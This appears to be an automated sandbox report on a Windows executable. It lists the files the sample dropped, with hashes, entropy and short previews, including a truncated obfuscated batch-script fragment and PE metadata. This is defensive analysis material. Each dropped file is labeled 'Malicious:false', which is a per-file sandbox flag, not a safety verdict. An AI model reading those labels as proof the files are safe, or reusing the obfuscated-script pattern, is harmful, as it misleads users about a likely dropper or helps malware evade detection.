                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):30720
                                                                                                  Entropy (8bit):6.710508352528447
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:/83OaSmnpPU+vNEvH1qamdsnRsYnjDORUfqK65oHzMSkCxZYL:U3OAOvHZnR2Uf9MoHzBxKL
                                                                                                  MD5:18B7ADCFBD90A1C15E9F1F6695C5D901
                                                                                                  SHA1:CF63F46B82388AEEE71BBFB8E562DE2A146AE6EE
                                                                                                  SHA-256:B30240078C64097B4256BE548703AC506E1F1243539566558AC6D5A4342EA0C2
                                                                                                  SHA-512:88925F016B92D75168770782E3BD0A9598F3779C9B17C973FCF7CD753BB55B0CF8B72C525937FF784C609846279A54A96A70554E94F7B77808E8A53B665D790C
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19456
                                                                                                  Entropy (8bit):6.405089114209641
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:vFpSOcoygCYNi3E1fdL3xnoR9t6T1vgA8kX7d8ILMwS5/Uwzc9mjqM:v0gNNiOfdjxnePB/qLMH/UwA9aT
                                                                                                  MD5:008576B744929086782F21A7065AC7C6
                                                                                                  SHA1:5D4D7607A007C1A068C2079DF38FC0464B6F9A2A
                                                                                                  SHA-256:A13C473C321151D9A0A95E835686A599CC8B610CC3100878AAEBDA99C1032C5C
                                                                                                  SHA-512:BD9C81EF3711EB293C6B5A71C3C9C00915F31AB8D8718F49E4CE1C8793225A966791A2C3C965C5A749C798AF16D731EAC6D5545D35E721FF0DCA6ECF51AC7C73
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24061
                                                                                                  Entropy (8bit):7.262249897829757
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:mlgavhytCjWoQL9dR0Xvwp52UW1l/hw50gFQTVaeCV1VEVFJ8ZcGwGBk7/UMQ3K6:mlgaJyc3rE2UWb/hMjFQTVat3VEV3GPP
                                                                                                  MD5:C8ED52EE2DC8795B24B1A7450E852153
                                                                                                  SHA1:77DB46296FA8AF5F1AC6C9B0136AD3A39521E4DF
                                                                                                  SHA-256:8268BCDA9CB466F90B2BB49C7E2A6A23E85C2CD8C7C63170E3C07839F40B333B
                                                                                                  SHA-512:FF830E5453554B2D2B1763E648009030F00A0853695A120584F0D89B148B31D7290A8632BE57ED5CDD0F9D8B82EEB0F6DDF825537E1D7BD7558D87113B102953
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32768
                                                                                                  Entropy (8bit):2.425293702421789
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:b3WMygaruSIKlcYaffffm4aLWWZg319stEjFto:ugar3R3GWZg3EYo
                                                                                                  MD5:1B7F48B935D786DEABE81D80E8304102
                                                                                                  SHA1:FB4563CD0145238A5219623F3D55515CFD1F9B3C
                                                                                                  SHA-256:B67FA393883721DF42E25346F033FFEA20A5775C3AD65B1CAD4995A9399EE494
                                                                                                  SHA-512:C8394F128FE1F2697A3D7E6734D4FCD16DD8BA340404029AE67E1B992F019FB43D2B010B807CA42590FD3781D5030BC47FB7C45C0BF72DE80B50BC442EE97380
                                                                                                  Malicious:false
                                                                                                  Preview:essageW....TranslateMessage....DispatchMessageW....LockWindowUpdate..].GetMessageW...BlockInput..&.OpenClipboard...IsClipboardFormatAvailable....GetClipboardData..I.CloseClipboard..V.CountClipboardFormats...EmptyClipboard....SetClipboardData....SetRect...AdjustWindowRectEx..T.CopyImage...SetWindowPos....GetCursorInfo.V.RegisterHotKey..G.ClientToScreen..A.GetKeyboardLayoutNameW....IsCharAlphaW....IsCharAlphaNumericW...IsCharLowerW....IsCharUpperW..X.GetMenuStringW..z.GetSubMenu....GetCaretPos...IsZoomed....MonitorFromPoint.._.GetMonitorInfoW...SetLayeredWindowAttributes....FlashWindow...GetClassLongW...TranslateAcceleratorW...IsDialogMessageW..{.GetSysColor...InflateRect...DrawFocusRect...DrawTextW...FrameRect...DrawFrameControl....FillRect..@.PtInRect....DestroyAcceleratorTable.X.CreateAcceleratorTableW...SetCursor...GetWindowDC.~.GetSystemMetrics....GetActiveWindow.1.CharNextW.3.wsprintfW.J.RedrawWindow....DrawMenuBar...DestroyMenu...SetMenu...GetWindowTextLengthW..j.CreateMenu....IsD
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):21504
                                                                                                  Entropy (8bit):6.4444830986437465
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/cfWX2mwcTVmeOwa9XyJZW06WCHAdjs1f9QrEMetI2zbLJSlvuHdUYzGM84qKoiX:CMEMUnLm8dUYzp8HKoqKs45T+5ht7
                                                                                                  MD5:13D593C5754D6F4A8E9AF71BC5FD7436
                                                                                                  SHA1:7C2802EFE0DD30482D5957E1E8974EA9BBC83D62
                                                                                                  SHA-256:B0A17D66F902476BE402A90D0341803C35A5BAD11862EBFFBF142843D7E6A8BD
                                                                                                  SHA-512:EB401457914FDB5FCDB15163A814C2699E95FCF8187B9016A9561E5E41CEBDA83FFDDAEC4B55A0052494466F5F7DF67C9F4A6CADF33A090FEABB73BBCC88FFA0
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):125
                                                                                                  Entropy (8bit):3.915438283623625
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:cwX7O72Uqt/vllpfrYZcFTS9n:cwXKqjvVgn
                                                                                                  MD5:596CE3EA9E2A42098635B6783A45C3BC
                                                                                                  SHA1:51A0F934024A3BDF8298DD81DA7504CCC054D72E
                                                                                                  SHA-256:47E13870CE739ADF64B33D403D391E14E29371C084CD243A6AF8386A9BF48AA3
                                                                                                  SHA-512:0106AC3A9DFEE0DFF5A8CB42C2A8979929462B30D5115D3F34A9531D99A333F79F1331D7345A0BF95572F430E76BA10B6F2291550B237CC6537352D5A3275408
                                                                                                  Malicious:false
                                                                                                  Preview:typesfaxincreasecompound..MZ......................@...............................................!..L.!This program cannot b
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64512
                                                                                                  Entropy (8bit):6.63709531987453
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:HoaLjzZU6i5HkY5RrVGyanwUhhNpis3aUQzQpOQ2qJdpnVwNxF5J:tfza6iyY5tVGvH7fsUQwHJJX4xF5J
                                                                                                  MD5:A29DC843982AE5D6F39F526AF992C746
                                                                                                  SHA1:F347D40AA331B98A890CF1DC53B81B079AA5A178
                                                                                                  SHA-256:D4C38B731D74A94D6840D655F51AFE3B845627912D7686BF7203D328DBC3E811
                                                                                                  SHA-512:98AC878A752F176D62FBBDC4E3A205DEA744C33B0DF090843C264AC6BD5A863CBE38DC4E15E9DF4B28F4954BA5962C3A7AA6E2D5C720291B3DDC2AD078B5B6C9
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34816
                                                                                                  Entropy (8bit):4.686237478132523
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:xa3HwwuBcPTc/mwftIQXoSpu88888888888888888888888888888zv888888k:xaAwuoc/mexe
                                                                                                  MD5:C64C2B97D85DC1E693AC8380A02561B9
                                                                                                  SHA1:3D7A7CA779535DC95884A8DB3D0C219900B80073
                                                                                                  SHA-256:22B3E1A7C825C104CC6E4663F983BAA48B6209C04EEE38B7E5ED24C883595D91
                                                                                                  SHA-512:8CAC7E97AFA2AE76A066BEE29B9607740DEE54FE5DB87BC86C9100ABEA5E58952DFEBAB1E40F3FC9929B82AC0A63AE4103EB83139DB44D29423C930F804373AB
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):56320
                                                                                                  Entropy (8bit):4.954169025998645
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:hGMAGWRqA60dTct4qNn2fhRE9PfKj+wsxyLtVSQsbq:gMaj6iTcohiPfKj+wsxw
                                                                                                  MD5:7A11677FD70F9EF646AD3B1ECC34C6EC
                                                                                                  SHA1:CBCE0D9C083EF29E1859A78AEEBD22EB8BC7098F
                                                                                                  SHA-256:2BD3AB984634CA7092F8C376BC1238D23D1E713FB1614BAF5F216C6515420AB4
                                                                                                  SHA-512:25A2552CB2D5C9AE54C59167323595B2F93FBA218F2BA8CA4A830BAF10A5AFAF0CD77CCA61D61DC3F5B47DF5E7023889229051946E0B9A860073FECFDEA2CE17
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):23552
                                                                                                  Entropy (8bit):6.512785069283945
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:FeVrnIhTMdtEo3/Tv1IkV/HwG68pc/v5sPrBzN02WsxkGVY0VlqhO1URH+esp8e/:FXymo3/TpwGHsv5sPrBzN02WsxNVY0Vd
                                                                                                  MD5:A598DA32EC9FBE430A0C33A1AC680E1C
                                                                                                  SHA1:6B1AF135E996D56B24618914733CDE7716B1DC53
                                                                                                  SHA-256:AF5A342B23BF7678578753C7ACEBA58163E4D8BC5A064D57D970A3C306407B81
                                                                                                  SHA-512:66937CFBFF4D7B7D627D99774E37BDCC6152DB87982DB9EE9D1E757FA319508F8FC2B4115CB7DF989757206F23D8AE587C6EF2494580B79AE5D4032B9763AC00
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):61440
                                                                                                  Entropy (8bit):6.661056883889966
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:08qcDP8WBosd0bHazf0Tye4Ur2+9BkxXNHMi0O0GmpefK7:0DWyu0uZo2+9BkxXibleE
                                                                                                  MD5:1F09FF6F831773E34531C68138C0280E
                                                                                                  SHA1:85E0BF9DEEEF07F2C3D481B363A4DCDD837BCBBB
                                                                                                  SHA-256:6BCE7BAD45476E1CE91FECD6BD648DEED5E9B7C23DC327E80EE41E7712AB7BD2
                                                                                                  SHA-512:FDE2D0BD2FCF5171FD4662CD802D0B9134C3A90A03703C797DE3130D6EDB229C5F5DCD925C7C6C57BAA7AADA82B3DD6E8186B893921F681E586EFBB6ABC45DB4
                                                                                                  Malicious:false
                                                                                                  Preview:.e.m.e.n.t. .i.s. .m.i.s.s.i.n.g. .".E.n.d.S.w.i.t.c.h.". .o.r. .".C.a.s.e.". .s.t.a.t.e.m.e.n.t...H.".C.o.n.t.i.n.u.e.C.a.s.e.". .s.t.a.t.e.m.e.n.t. .w.i.t.h. .n.o. .m.a.t.c.h.i.n.g. .".S.e.l.e.c.t.".o.r. .".S.w.i.t.c.h.". .s.t.a.t.e.m.e.n.t.....A.s.s.e.r.t. .F.a.i.l.e.d.!.....O.b.s.o.l.e.t.e. .f.u.n.c.t.i.o.n./.p.a.r.a.m.e.t.e.r...4.I.n.v.a.l.i.d. .E.x.i.t.c.o.d.e. .(.r.e.s.e.r.v.e.d. .f.o.r. .A.u.t.o.I.t. .i.n.t.e.r.n.a.l. .u.s.e.)...+.V.a.r.i.a.b.l.e. .c.a.n.n.o.t. .b.e. .a.c.c.e.s.s.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r.....F.u.n.c. .r.e.a.s.s.i.g.n. .n.o.t. .a.l.l.o.w.e.d...*.F.u.n.c. .r.e.a.s.s.i.g.n. .o.n. .g.l.o.b.a.l. .l.e.v.e.l. .n.o.t. .a.l.l.o.w.e.d...........(...0...`.........................................................................................................................................................................................................."".!...............!!.#3S33"!.!! ............$3W3SCS"!..............&#C3W6#bbB!!.........!!$36$$2S433b2.........
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):35840
                                                                                                  Entropy (8bit):6.468742273417834
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:otAak7jbWyw2QH4IYkNe4yU6en8FZ++oUhPtLuyfGby2QTcBMHa9kV6tjwqLDEtk:ow7fWJhNz96en8FZ/oUhPDZcBMHa9kV2
                                                                                                  MD5:C375C2895142B156B4F7B71A016C6D8B
                                                                                                  SHA1:E5165A99047029FD415F7D5801E002BBE1F6D665
                                                                                                  SHA-256:9C9D3482EE9EB7860B0C69C9D68754A33FC65C52E055E8E787486673AB341C2B
                                                                                                  SHA-512:6EAC28CD7A6E84F287F8B35065658B2CA74B48A53CEBB09FD38434D7DC0C93B91FDAB33CEA58387A297B5818DD0BEAE163915B993192AE288A7FB4668340BC90
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):72704
                                                                                                  Entropy (8bit):7.997293675616384
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:P63WVS237cc9HY2D67NpiLqC8NLJ+OznoYUO+ghQR8:P63WVS237I2ONJjNLJ+llvDO
                                                                                                  MD5:157B36496A4225E1457EA8339668C2E8
                                                                                                  SHA1:421FA3EC7B1B82CA3B33070209B49A9CA39C7E2F
                                                                                                  SHA-256:45DFDAFEBFAC3FE00A6DBD7029B3AF8D9578D8E70F2ED172F548D4832F987645
                                                                                                  SHA-512:87746469A2888F7891EAA8E2AA336E4579D4780B5848990E74D66FA0993CA529617EEE184365E59456C52789D319A18DD76182887AC20A71CB3AE5C3339DA5F7
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24576
                                                                                                  Entropy (8bit):6.6128670749383565
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:NwMiVVn76VTBrg+8cm0hZtLvQHC4AvAaQJpXuCECW/Zv+PqraAGjNWyIjGuv3NIB:u5ATBrJ8oDLIi7AhJpzEzZGCrRyIjd3U
                                                                                                  MD5:4AE56B1EA9426E108A92773B1D849A9A
                                                                                                  SHA1:C85A0A134FADBAB5D8BCC4F918BE683584BA2E3A
                                                                                                  SHA-256:ED896CBF5263298907D8A47FE2B177AD1B1A93927CDE77B18FA1FDEB51B52313
                                                                                                  SHA-512:94D495A148D8108D5AC31D6D05DAA20EE50132AF5818184F79F2EE274E19F44028AF09ED4C47F7D887F9644B01462E04D018830D842853439DB678AF705EDD52
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14025
                                                                                                  Entropy (8bit):7.987441054592208
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ocJnPPTIIbeFLio+J7fo/pzo58rUeHX9yMaVVj8FFPJrxEKgu6xhPm3oucsutQSV:35PrVbYLio+JL2eneHRaVVsfshPm3dob
                                                                                                  MD5:1B5740767511DFB227EE4394EC636127
                                                                                                  SHA1:C623CD657C2AEB46BC5AD4E74E833D1FA223B2B7
                                                                                                  SHA-256:487A4DA35ECFA61FBEAC8DBD9C9DA4819544C870A48EC104817C592BB1C1F37A
                                                                                                  SHA-512:E086431BF018C184631FE3E492CE79A063272EECF55940B4264F8E7260CD25E0EE9F51786D565628E96B70B0EED91DB084E04025A4C191FC144BD29A06E94C0F
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8192
                                                                                                  Entropy (8bit):6.656799503621816
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:n4mrTFIyADVTcSEuyJ+ISlkaDxp7dQ9k9k6vlGs:4EIyAZTcdl+ISlNx+j69R
                                                                                                  MD5:9BF05E462BD34FD8D07AD1D6C999BC99
                                                                                                  SHA1:B40F67619BB3ADB12D62EF44AA72F765AC4AF057
                                                                                                  SHA-256:E4DA03EF6C2D974042B126C483BC750FC1A6F831B3988E99EC7D82BE33C7999A
                                                                                                  SHA-512:749757694599F5C241D107CC54FB9FC2FC083AD56BDBA60F21A41340795CFAC37FEBA9D3A416287744CA1FB620A42F3A8DBDEAE65A1E6A741E91E33A57419D56
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):37888
                                                                                                  Entropy (8bit):6.351472271518469
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:x5/RUIDn1hGNfgN/ROqVlHBjLAbjBVELX2vn0bU7TTF7Fy2UTZ7IVs:XiAh2QOSlh3wTYGvn4Ufp7Q2Ul7J
                                                                                                  MD5:6A2E7DA1FE0B6D4BA04630CD71A7175F
                                                                                                  SHA1:D5EAE8C8AFF5445B0CB9701EE58FC0F948222C3A
                                                                                                  SHA-256:1CEC9DB07DC2944675E16550286A48FEE8EA2FF23B2E14C26AEF171C3587B001
                                                                                                  SHA-512:0C07A214AFCCB8BB6346EF6B1CB679D37B82454CB9AD8D7622142A7703B506965187CA71564009348B20F692A4E8E9F669F7C2C236632CAA4AB03861572F0949
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:DOS executable (COM, 0x8C-variant)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):44032
                                                                                                  Entropy (8bit):5.635046713265792
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:gl/nqYHjWYPCy8CRrGPL5Eg10uVGHj9/viMxYWDOgZHHVzJWkQxZaT4:gNnqYHjZV8CVGD5EDuVGHj1vtKs51Vql
                                                                                                  MD5:E3E0B837BE28298815201C73FC5A3BAB
                                                                                                  SHA1:8642C3A3BC018A1865FE7A27A2A64155F116EE2D
                                                                                                  SHA-256:9957EED2B201572A696317F22C825099E6753E2F6E3B0EF243BD3431294D007B
                                                                                                  SHA-512:FC129CC7E548E4FE3C54FB1463BCFF1D3EA9EBC9852532850A3E0C7BCDEC7E23C15E4A5E899DB96D9882F4B1AC36495A26E6B9993578A584993AA2B67385D42D
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:ASCII text, with very long lines (1017), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13541
                                                                                                  Entropy (8bit):5.0230071746545315
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jGRNHwstM6FM1g2iLOvu5pCP8VJAP/VmjJnHgi:irwsnxi8pI8PAFmFAi
                                                                                                  MD5:9E17257439AB3DEFC0B3AAE737EAEE80
                                                                                                  SHA1:A9C14852315854726BB75A2702A11CAB4E7263A9
                                                                                                  SHA-256:4EF2DF5760049AD16B8860E7BEFBEDE0C650B2BF0D797612BA0502B6CA064235
                                                                                                  SHA-512:31B632F4537CC0E8EEAD424A7362F105EF4942A6286AE47C48CD44BB16C392F65637350841676962CAB336BCE54075CD6EC376564BE89C39450D159BD432CBC6
                                                                                                  Malicious:false
                                                                                                  Preview:Set Apartment=o..xaxxParking Were Seen Implications Behaviour ..ZYNmReasons Ti Korean Arkansas ..jCNightmare Offense Afternoon Artistic Exhibition Gp Sas ..tuIGenerally Unsigned Cottage Near Sixth Nightlife ..PeARocky Nutten Blame Year Fundamental Mate Sr ..iPGPOmissions Travis Ja Archive Enterprises Hundred Tiger Store Bodies ..ZPJUMpeg Receptor Require ..yThbGrenada Header Va ..sBRentcom Cg Drove Webmasters Threesome Calculation Intersection ..FFUProtocol Blue Controversy Possibly Pathology Numerous ..Set Controllers=T..VJFriendship ..hIUPeter Livesex Moving Cardiff Detroit ..cWsDive Dick Bruce Lately Wires ..MupEmployees Oxide Cached Bradley Quantity Spouse Inquiry ..FvShip Nintendo Bunch Urgent Fs Battle Mitchell Stockholm ..gLgCell Ser Scientific Concerts Bangladesh Salem Regards ..noAi Greenhouse ..Set Italian=w..ppdMorrison Institute Penny Yields Meter Obtaining Leaves Cliff Documented ..bEaWanting Tradition Around Distinguished ..QJFinances If Types Transferred Webster Nt Charl
                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                  File Type:ASCII text, with very long lines (1017), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13541
                                                                                                  Entropy (8bit):5.0230071746545315
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jGRNHwstM6FM1g2iLOvu5pCP8VJAP/VmjJnHgi:irwsnxi8pI8PAFmFAi
                                                                                                  MD5:9E17257439AB3DEFC0B3AAE737EAEE80
                                                                                                  SHA1:A9C14852315854726BB75A2702A11CAB4E7263A9
                                                                                                  SHA-256:4EF2DF5760049AD16B8860E7BEFBEDE0C650B2BF0D797612BA0502B6CA064235
                                                                                                  SHA-512:31B632F4537CC0E8EEAD424A7362F105EF4942A6286AE47C48CD44BB16C392F65637350841676962CAB336BCE54075CD6EC376564BE89C39450D159BD432CBC6
                                                                                                  Malicious:false
                                                                                                  Preview:Set Apartment=o..xaxxParking Were Seen Implications Behaviour ..ZYNmReasons Ti Korean Arkansas ..jCNightmare Offense Afternoon Artistic Exhibition Gp Sas ..tuIGenerally Unsigned Cottage Near Sixth Nightlife ..PeARocky Nutten Blame Year Fundamental Mate Sr ..iPGPOmissions Travis Ja Archive Enterprises Hundred Tiger Store Bodies ..ZPJUMpeg Receptor Require ..yThbGrenada Header Va ..sBRentcom Cg Drove Webmasters Threesome Calculation Intersection ..FFUProtocol Blue Controversy Possibly Pathology Numerous ..Set Controllers=T..VJFriendship ..hIUPeter Livesex Moving Cardiff Detroit ..cWsDive Dick Bruce Lately Wires ..MupEmployees Oxide Cached Bradley Quantity Spouse Inquiry ..FvShip Nintendo Bunch Urgent Fs Battle Mitchell Stockholm ..gLgCell Ser Scientific Concerts Bangladesh Salem Regards ..noAi Greenhouse ..Set Italian=w..ppdMorrison Institute Penny Yields Meter Obtaining Leaves Cliff Documented ..bEaWanting Tradition Around Distinguished ..QJFinances If Types Transferred Webster Nt Charl
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):61440
                                                                                                  Entropy (8bit):6.172007656973097
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:LgEtEq2fG8YWqbmJYT5yXDlY9/UL4sgTNU+ufxv5I:L9t68cCWlrss4M5I
                                                                                                  MD5:F0EA4942F09528F44E39ACAE9C2F06BC
                                                                                                  SHA1:259FB0A1FEA589A7FA1B290CEA91879046D08CE8
                                                                                                  SHA-256:2405E33214050C56649FD0FAB58B486F8CC98C1242EA94EBB1CEA897575DCAF5
                                                                                                  SHA-512:E0D0275C9CBA31164388A190CD2BF082DEDAAEC12EE8395C025352A6851E3553E51AC3EC97D246892778307B66B7CF1B7F86778FF369921D1C625274ADAB6152
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):37888
                                                                                                  Entropy (8bit):6.536743940945966
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:2GY3PV7p180HcjRChcjDhU/RWEOrsaQ8UEd39+rdQLnBb2xXLDNxFch4A0:63Ppp180HcdCKjlWF0nQi9+knILDTJ
                                                                                                  MD5:04FB7D0A81DF5BD49F816A03E761DE1A
                                                                                                  SHA1:6923B7A465C7AB49546B735827B9B1A210B74BA9
                                                                                                  SHA-256:FDD32FF1BF55CCCAD61460D636A0FDECF52650584D1A0B70A8D424A167B14F32
                                                                                                  SHA-512:CB95AD9EDC7CED4905C87A72B186D8AD3283FA18424E6A40F7A8D6C1040FAD21F3EA1FB276257B91AC8C00C6FEA8AD83CB8C5086B313FCD5F9D40F38C6B72F15
                                                                                                  Malicious:false
                                                                                                  Preview:e run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B.........................................................................................................................................................................................................................................................................................................d.M.....h9'D......Y.hC'D......Y..-...hH'D......Y...F..hM'D.....Y.Q.%...h
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18432
                                                                                                  Entropy (8bit):4.336346044366836
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:7sIiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiKX1Od5T1A/nYYYYYYYYYYYYYYYYYYZ:NOTyuav84444W
                                                                                                  MD5:28150242131957A37E7234031DA8CCF4
                                                                                                  SHA1:78BAE72BF0E3076638633F7F7585D917D68D39FF
                                                                                                  SHA-256:9E790BC388FB495773FD201A994038ACE8DF4346D50EE2CDF36EE730ACF2279C
                                                                                                  SHA-512:CECE17E5863FD6696F9C8555E6594C22807078405F326A6A72CB7C29DB56890B0C9EA966AB87B88F07E67030467A03F20D6B431E8637A90211A019507D99C587
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40960
                                                                                                  Entropy (8bit):6.507086619437831
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:2OIXyTkAZ0JhMsQf8HgOBsTBJkWVBJV/wJFU3ZHZMwetEOA5p5yMiwsSX1UxoWSd:2OIXyTsJ0Oetj0EJ5MwPOOFU6WS2uoy/
                                                                                                  MD5:A3E3F4669FA720E540FB8F3FEEA3A54E
                                                                                                  SHA1:B0CD2BA80800EADD2FE244B945734D7CF38712E4
                                                                                                  SHA-256:A9A08DEBEC110CABEDB5521C338E68D427F9A1C201B853623FE8F4A3B94F417E
                                                                                                  SHA-512:F3BD14E4B870E2CE9550DE9C30A63925E5E93EC23CBE61DCD2EAA548A8A4A1D866B8A6ECC29E59A4562361A6841865BB69DD55ACF48211970218E8C5BD776F1A
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:GTA2 binary mission script (SCR), Residential area (ste)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):165888
                                                                                                  Entropy (8bit):7.999117209114117
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:3072:w/IVdo4g1Q+F60QkRj/fbNL17YQbxGzds+i2U/ciOUoCiboEmnzjx0KX:fVLg1Q/UTBKQbxXT2FivQ9uzjxX
                                                                                                  MD5:53BD3CA945CDBE9CA0470F75C619714F
                                                                                                  SHA1:B745FA55CDC1297BEACB482F4A4FBD622072FB5C
                                                                                                  SHA-256:D62A0EEEE81532CF6D2254ABDF5CDEB3C1030F60F3DBE893C6108B8E090A0934
                                                                                                  SHA-512:08E11BAE3557615D12F87A3BEE08630E039BEE53BE0089B6AB48108EC205A93E002A26611F88AA133DEFCEF12FBF59FF9C27C4E4DA4CDFC8EB05218D7FE4ADEA
                                                                                                  Malicious:false
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.953452448362295
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:file.exe
                                                                                                  File size:867'038 bytes
                                                                                                  MD5:569720e2c07b1d34bac1366bf2b1c97a
                                                                                                  SHA1:d0c7109e04b413f735bf034ce2cb2f8ee9daa837
                                                                                                  SHA256:0df79273aea792b72c2218a616b36324e31aaf7da59271969a23a0c392f58451
                                                                                                  SHA512:fa83ba4e0b1fa1f746e0ff94cb8f6e4ed9c841c66cc661c6fd28d30919ae657425fe0bb77319cf328a457600e364147c6e9d9140548a068a18a7e2ca0a3a2436
                                                                                                  SSDEEP:24576:TPULtGy0ccUe2jZIneELXUCULPoQg8bXT:zIfcOj4Yv
                                                                                                  TLSH:B5052302C6B9E067F9D60D7056B5BA272F7679581E30804E0728D96F3D727C9E2AA331
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                                                                  Icon Hash:6066ced2d0c4fc0c
                                                                                                  Entrypoint:0x403883
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:true
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:5
